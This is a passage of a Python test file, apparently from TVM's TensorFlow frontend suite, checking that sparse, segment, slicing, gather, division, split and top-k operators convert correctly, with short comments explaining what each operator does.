sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
"""sparse_reshape op test"""
###################################################################
#
    # Creating a SparseTensor requires 3 inputs, as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the following dense tensor:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
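# The sparse segment ops first gather data[indices] and then reduce per segment
# id. As a worked example for the first case below, data [5, 1, 7, 2, 3, 4]
# with indices [0, 3, 4] and segment_ids [0, 1, 1] gathers [5, 2, 3], so
# tf.sparse.segment_sum yields [5, 5] (segment_mean would yield [5, 2.5]).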
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
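# For reference: tf.math.segment_sum(data, segment_ids) expects sorted segment_ids and
# sums the rows of data that share a segment id. E.g. data=[5, 1, 7, 2, 3, 4] with
# segment_ids=[0, 0, 0, 1, 1, 1] yields [5 + 1 + 7, 2 + 3 + 4] = [13, 9]
# (first parametrized case below).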
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
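# For reference: sparse_to_dense builds a dense tensor of the given output_shape where
# dense[sparse_indices[i]] = sparse_values[i] and every other element is default_value.
# E.g. indices=[0, 1, 4], values=[3, 3, 3], shape=[5], default=0 -> [3, 3, 0, 0, 3].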
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
        if default_value is None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
"""One iteration of tf.sparse.add"""
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        # TODO(ANSHUMAN87): support user input threshold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
"""sparse.add op test"""
###################################################################
#
    # Creating a SparseTensor requires 3 inputs, as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
    # The above sparse tensor can be represented in dense form as below:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
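    # For reference: when one operand is a SparseTensor and the other is dense,
    # tf.sparse.add returns a dense tensor equal to tf.sparse.to_dense(A_sp) + B.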
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
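# For reference, the mask arguments below are bit fields (bit i refers to slice spec i):
#   begin_mask / end_mask : ignore begin[i] / end[i] and slice from the start / to the end
#   ellipsis_mask         : that position acts like "..." and expands to full slices
#   new_axis_mask         : insert a new length-1 axis at that position
#   shrink_axis_mask      : index that dimension with begin[i] and drop it from the result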
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
"""One iteration of a Stridedslice"""
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
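# For reference: tf.truncatemod is the C-style remainder (result takes the sign of the
# dividend), while tf.floormod above is the Python-style remainder (sign of the divisor).
# E.g. truncatemod(-7, 3) = -1 whereas floormod(-7, 3) = 2.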
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
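# For reference: tf.gather(data, indices, axis, batch_dims=b) treats the first b dimensions
# of data and indices as a shared batch and gathers along `axis` independently per batch.
# E.g. with data of shape (2, 2), indices of shape (2, 2), axis=1, batch_dims=1:
# out[i, j] = data[i, indices[i, j]].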
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
"""One iteration of a GatherV2"""
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
#######################################################################
# GatherND
# --------------------------
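# For reference: in tf.gather_nd the last dimension of `indices` indexes into the leading
# dimensions of the input. E.g. params=[[1, 2], [3, 4]] with indices=[[0, 0], [1, 1]]
# yields [1, 4]; if the index tuples are shorter than the input rank, whole slices
# are gathered instead.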
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
    def check_bias_add(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
    """One iteration of a Split"""
    np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
